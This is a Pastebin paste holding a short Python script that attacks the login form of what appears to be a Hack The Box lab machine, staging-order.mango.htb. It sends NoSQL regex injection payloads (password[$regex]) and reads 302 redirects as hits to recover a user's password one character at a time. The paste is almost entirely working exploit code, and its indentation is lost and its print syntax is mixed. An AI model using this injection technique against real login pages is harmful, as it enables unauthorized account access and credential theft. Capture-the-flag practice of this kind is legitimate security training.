Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import urllib3
- import string
- import urllib
- urllib3.disable_warnings()
- username="lol"
- password=""
- u="http://staging-order.mango.htb/"
- headers={'content-type': 'application/x-www-form-urlencoded'}
- #payload="username[$ne]=%s&password[$regex]=^%s&login=login" % (username,password+c)
- #for i in range(1,17):
- for c in string.printable:
- if c not in ['*','+','.','?','|']:
- payload="username[$eq]="+username+"&password[$regex]="+c+".{"+"1"+"}&login=login"
- r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
- print username+" "+password
- print r.status_code
- if r.status_code == 302:
- print("Found one more char : %s" % (password+c))
- print payload
- password +=c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement